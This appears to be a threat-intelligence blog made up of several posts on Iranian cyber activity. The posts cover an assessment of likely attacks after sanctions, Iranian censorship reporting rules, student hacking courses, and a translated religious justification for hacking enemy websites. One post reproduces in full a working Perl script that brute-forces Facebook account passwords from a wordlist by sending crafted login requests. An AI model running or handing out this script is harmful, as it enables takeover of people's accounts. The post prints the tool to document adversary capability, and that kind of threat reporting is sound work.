Iran to cyber-attack the US?

Most all organizations knee-jerk responses to the sanctions as an immediate for Iranian cyber attacks against the US. This is not unusual for such organizations as it helps sell product and is solely based on a limited understanding of the area and a focus on so-called ‘threat intelligence.” A much larger geopolitical view is required. This is a standard response and not one based on evidence or fact but emotional responses to a US-initiated action. Iran has been targeting the United States since approximately 2002 with the formalization of certain digital security and hacking groups in Iran. Any Iranian attacks against the US would lead to exponentially more lethal attacks against Iranian targets by the US. Iran will most likely focus its efforts on suppressing any internal dissent, squashing any visible means of internal turmoil while censoring the ability of Iranian citizens to openly express their contrary viewpoints via the Internet. Treadstone 71 does not believe any attacks on US soil i.e., against critical infrastructures in the US would be productive for Iran at this time. We may see continued probes, scans, and methods of enumeration against these sites but direct attacks are not likely unless it is retaliatory (based upon other than sanction actions by the US). We may see increased cyber actions against US military capabilities in the Persian Gulf as methods of testing relative to war games in and around the Straits of Hormuz. With economic unrest and visibly upset people in Iran, Iran has more internal troubles and will likely focus their efforts there. We do not believe we will see any immediate, state-sponsored attacks against the US from Iran as a result of the sanctions at this time. This could shift and increased vigilance is still warranted.

Our Previous statement from May still holds

With more control over Iranian hackers now as opposed to the past, Rouhani may exhibit restraint thereby not playing into US hawk ‘I told you so’ pundits. Any hacks of substance coming from Iran at this time would be directed by the government but it is unlikely we will see an immediate uptick in activity based upon the already expected response from the current US Administration. Rouhani still has the ability to work China, Russia, and the EU over the existing agreement. If anything, this places the US further on the outside of global activities creating another vacuum where we once stood. Any Iranian overt and targeted hacking at this time against the US would be counterproductive to their aims.

Further to, it is possible that Rouhani detractors inside Iran could execute targeted attacks against the US as a method to discredit his administration while supporting the view from US hawks. Hardliners in Iran are not satisfied with the agreement and may do more beyond hacking to discredit Rouhani with remaining agreement members.

Additionally, adversaries of Iran could execute cyber false flag operations to make attacks look as if they originated from Iran in order to discredit the Iranian leadership as a pretext for increased sanctions and cyber actions.

Regardless, we should expect increases in reconnaissance, phishing, and social engineering actions in preparation for much larger actions. Monitoring of this activity, the locations from which they occur as well as any changes in adversary and payload speed, targeting, and maliciousness, should be increased in standard surveillance and warning actions. An increase in the ‘cyber defcon’ at least for vigilance is warranted.

09/08/2018 0

Iranian Hacking – Saudi Sites – Bruteforcing facebook zhacker

Music is horrendous – be warned

and the script:

#!/usr/bin/perl
#

use strict;
use Net::SSLeay::Handle;

if(!defined($ARGV[0] && $ARGV[1])) {

system(‘clear’);
print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;37m Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n”;
print “\033[1;31m ======================================================\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
exit; }

my $user = $ARGV[0];
my $wordlist = $ARGV[1];

open (LIST, $wordlist) || die “\n[-] Can’t find/open $wordlist\n”;

print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;33m made by [[Z hacker]] \n”;
print “\033[1;31m ========================================================\n”;

print “\033[1;39m\n [+] Cracking Started on: $user …\n\n”;
print “=======================================\n”;

while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf “%%%0x”, ord $1 /eg;

my $a = “POST /login.php HTTP/1.1”;
my $b = “Host: http://www.facebook.com”;
my $c = “Connection: close”;
my $e = “Cache-Control: max-age=0”;
my $f = “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
my $g = “Origin: https://www.facebook.com”;
my $h = “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31”;
my $i = “Content-Type: application/x-www-form-urlencoded”;
my $j = “Accept-Encoding: gzip,deflate,sdch”;
my $k = “Accept-Language: en-US,en;q=0.8”;
my $l = “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3”;

my $cookie = “cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa”;
my $post = “lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In”;
my $cl = length($post);
my $d = “Content-Length: $cl”;

my ($host, $port) = (“www.facebook.com”, 443);

tie(*SSL, “Net::SSLeay::Handle”, $host, $port);

print SSL “$a\n”;
print SSL “$b\n”;
print SSL “$c\n”;
print SSL “$d\n”;
print SSL “$e\n”;
print SSL “$f\n”;
print SSL “$g\n”;
print SSL “$h\n”;
print SSL “$i\n”;
print SSL “$j\n”;
print SSL “$k\n”;
print SSL “$l\n”;
print SSL “$cookie\n\n”;

print SSL “$post\n”;

my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
}
}
if (!defined $success)
{
print “\033[1;31m[-] $password -> Failed \n”;
close SSL;
}
else
{
print “\033[1;32m\n########################################################\n”;
print “[+] \033[1;32mPassword Cracked: $password\n”;
print “\033[1;32m########################################################\n\n”;
close SSL;
exit;
}
}

Rinlogger Teaching

23/02/2018 0

Plague of the Cyber RATS

How a toxic computer code delivered by ‘Remote Access Trojans’ is an invisible army able to take over a petrochemical plant and blow it to pieces

Ironically, said Bardin, it was Stuxnet that led Iran to enhance its offensive capability: ‘If Stuxnet had happened to the US or UK, it would have been seen as an act of war. In Iran, it made them invest heavily in offensive cyber operations.’

He revealed that 18 per cent of Iranian university students are studying computer science – a cyber warfare talent pool.

http://www.dailymail.co.uk/news/article-5404055/How-hackers-using-RAT-malware-seized-petrochemical-site.html

No guns. No bombs. No conventional weapons of any kind. An invisible army able take over a petrochemical plant like this and blow it to pieces. That’s the power of a toxic computer code delivered by RATs – ‘Remote Access Trojans’ – that’s making UK security experts VERY nervous indeed

‘Fixing this takes political will, and business is always pushing back, because good cyber security adds costs,’ said Bardin. ‘Ultimately, something is going to blow up.’

18/02/2018 0

Gerdab.ir – Oppress your people – Basij turn on your own. The new Savak – Pasdaran and Basij – Rules of Oppression Reporting

http://www.gerdab.ir/fa/report – GISTED

Report internet fraud:

This section introduces web content that is considered criminal by the people. Members can be distinguished based on the 5 following paragraphs; identifying offending Web sites for tracking and report to officials.

The content of the website is based is based upon the following criminal offenses:

Section A: Content against public morals and ethics

Production, distribution, and trading of pornographic and vulgar content, including audio, video and written, true or false, and in different formats (video, photos, animation, online games, computer games, cartoons, etc. . .)
1. Porn: show full nudity or male or female genitals, intercourse or a sexual act.
2. Vulgar: The contents of a sexually stimulating images.
Promote and sell products related to illegitimate and illegal sex.

Section B. contents against Islam

Insulting Islam and its principles, insulting the Fourteen Infallibles (SAW), insults and abuses against lslam and the realm of divine messengers.
1. NOTE: The Fourteen Infallibles (Arabic: معصومون‎ Ma‘sūmūn) are Twelver Shī‘ah Islam religious figures from between the 6th and 9th century whom Twelver’s believe are infallible, i.e. “divinely bestowed [with] freedom from error and sin”. This quality of infallibility is known as Ismah. The Fourteen Infallibles are Muhammad (SAW), his daughter Fatima Zahra and the Twelve Imams.
2. PBUH – Peace Be Upon Him
Insulting Imam Khomeini, the Supreme Leader using animals and mutilated bodies to mimic certain of comments the leader has made.
Promote attitudes and deviant religious sects (such as the Baha’i, Sufi, Satanism, etc.) and any such emerging false religions.
The promoting of superstition witchery, palm reading, summoning spirits (séance) and the like

Section A: Content against public peace and security

The setup and formation of cyber threats and radical acts of online terror and propaganda.
Ethnic issues – trying to create a rift between ethnic groups and national security.
Disclose and reveal the secrets and official documents (both military and civilian).

Section D: The Content on government and public officials

Spreading lies against official and unofficial (explicit or otherwise) and with the intent to harm the Islamic Republic.
Insulting and slandering the government and public institutions and organizations

Section E: The content for computer crimes and other offenses used

Incite or encourage people to use drugs and psychotropic substances, commit suicide and violence
Advertise for criminal activities such as the establishment and promotion of the economic pyramid schemes (organizations)
The release of a virus, VPNs, proxies and other methods to circumvent government cyber controls
Links to websites (including blogs and sites) that are blocked by the government (both domestic and foreign)

5 – Training on unauthorized access and eavesdropping, spying, disruption of computer systems.

Dear user,

Be rewarded by reporting … know we will verify what you send. We who perform Internet content filtering are grateful for your efforts.

So turn in anyone you wish since we watch you, you watch your family and friends, they watch you, the watchers are watched by other watchers and they are watched by us.

07/09/2015 1

They Paid the Ultimate Sacrifice – Green Revolution 2009 – Iran

As we proceed through the negotiations with Iran we must not forget who we are dealing with and the recent history of the Green Revolution of 2009. Many sacrificed all they could. Oppression and censorship were but a few of the actions taken by the IRGC and Basij under the direction of the government. Many died and disappeared.

https://treadstone71llc.files.wordpress.com/2014/05/brief-on-iranian-oppression.pdf

Below is a list of those we have lost in Excel format.

Iranian dead and detained – Green Revolution 2009

17/05/2015 0

Education on Honeypots – Sharif University Courses on Honeypot Detection

There are many documents available on honeypot detection. Not too many are found as a Master’s course at University levels. Sharif University as part of the Iranian institutionalized efforts to build a cyber warfare capability for the government in conjunction with AmnPardaz, Ashiyane, and shadowy groups such as Ajax and the Iranian Cyber Army is highly focused on such an endeavor. With funding coming from the IRGC, infiltration of classes and as members of academia with Basij members, Sharif University is the main driver of information security and cyber operations in Iran. Below is another of many such examples. Honeypots and how to detect them is available for your review.

Treadstone 71

07/05/2015 0

Education on Anonymity – Sharif University Courses on How to Hide TOR

Well planned efforts by Iran to educate their students starts before University levels. Regardless, Iranian universities with funding from the government (IRGC), oversight by Basij, capture the flag exercises, internships through Ashiyane and AmnPardaz, and unauthorized testing on adversary websites provide a structured program. Much like the West, Iran is institutionalizing cyber in their young. The below is a lecture given at Sharif University using Western technologies and materials. The use of TOR is well explained.

Treadstone 71

05/05/2015 0

Religious Justification for Hacking Adversaries

Your question seems to be too general. However, Islam does stand for

better cooperation and communications with nations who are not

destroying and fighting us. This is clearly stated in Almighty Allah’s

saying: “Allah forbiddeth you not those who warred not against you on

account of religion and drove you not out from your homes, that ye should

show them kindness and deal justly with them. Lo ! Allah loveth the just

dealers. Allah forbiddeth you only those who warred against you on

account of religion and have driven you out from your homes and helped

to drive you out, that ye make friends of them. Whosoever maketh friends

of them (All) such are wrong doers.” (Al-Mumtahanah: 8-9). This means

that one should differentiate between those enemies who are killing our

innocent and helpless Muslims around the world and those enemies who

help or assist them in doing so.

In addition to that, one has to do his best to tackle and hack those sites

which are meant to murder and kill Muslims. Furthermore, Muslims

should be able to discover the plans and strategies of our enemies in order

for them to come up with strategies that will protect us against the attacks

of the enemies.

In this regard, I shall say there is no harm or prohibition to hack any site

meant to destroy Muslims or occupy our lands. It is a legitimate right to

defend ourselves by using all possible means and tools including hacking

and destroying those evil sites.

01/05/2015 0

A Brief on Iranian Oppression

Lest not forget the suppression occurring in Iran now and in the past. For years, any inkling of free speech counter to the government or the ruling theocracy was immediately and swiftly crushed. Recently, the song Happy and associated video celebrations subvert the regime. Comments on Facebook subject Iranians to harassment and prison terms. Torture a standard method of correctional education.Brief on Iranian Oppression may be downloaded / read. (PDF)

–

29/05/2014 0

Share this:

Like this:

Share this:

Like this:

Share this:

Like this:

Share this:

Like this:

Share this:

Like this:

Share this:

Like this:

Share this:

Like this:

Share this:

Like this:

Share this:

Like this: